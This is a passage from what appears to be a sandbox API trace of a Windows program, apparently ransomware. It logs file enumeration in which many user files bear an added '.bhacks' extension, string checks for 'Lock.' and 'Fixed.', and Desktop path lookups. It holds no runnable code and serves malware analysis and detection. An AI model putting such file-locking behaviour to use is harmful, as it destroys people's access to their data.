hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249d9033, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x249d9033, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24c15251, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="JkNoq.avi.bhacks", cAlternateFileName="JKNOQA~1.BHA")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cfc8f3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24cfc8f3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24e51519, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xfb70, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi.bhacks", cAlternateFileName="J_GUXI~1.BHA")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25257692, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25257692, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25362701, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Kz5g.mp4.bhacks", cAlternateFileName="KZ5GMP~1.BHA")) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0083.889] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0083.889] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0083.889] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25362701, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25362701, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2552c345, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb5f0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cAlternateFileName="NYVW1N~1.BHA")) returned 1 [0083.889] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0083.930] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0083.930] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f82a07, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24f82a07, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251263f5, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x7be0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi.bhacks", cAlternateFileName="TAB3I0~1.BHA")) returned 1 [0083.930] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0083.930] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0083.930] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0083.930] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2559e9dc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2559e9dc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa120, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="WLViPvkU.mp4.bhacks", cAlternateFileName="WLVIPV~1.BHA")) returned 1 [0083.930] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0083.931] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0083.931] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ィʥ먀ʞⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0083.931] FindClose (in: hFindFile=0x98f7c8 | out: hFindFile=0x98f7c8) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-yB2WD9ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yB2WD9ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B2WD9ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2WD9ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WD9ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D9ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZHipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ipl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pl10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="10.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-yB2WD9ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yB2WD9ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B2WD9ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2WD9ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WD9ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D9ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZHipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ipl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pl10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0083.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="10.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0083.932] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0083.932] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0083.932] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0083.932] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0083.932] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0083.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0083.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0083.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0083.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720f8 [0083.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb28 [0083.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720f8 | out: hHeap=0x2af0000) returned 1 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720f8 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6dff0 [0083.933] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dff0 | out: hHeap=0x2af0000) returned 1 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720f8 | out: hHeap=0x2af0000) returned 1 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb28 | out: hHeap=0x2af0000) returned 1 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0083.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6dff0 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e108 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb28 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720f8 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb28 | out: hHeap=0x2af0000) returned 1 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e158 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb28 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72108 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e450 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722e8 [0083.933] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e450 | out: hHeap=0x2af0000) returned 1 [0083.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721c8 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722e8 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72308 [0083.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0083.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 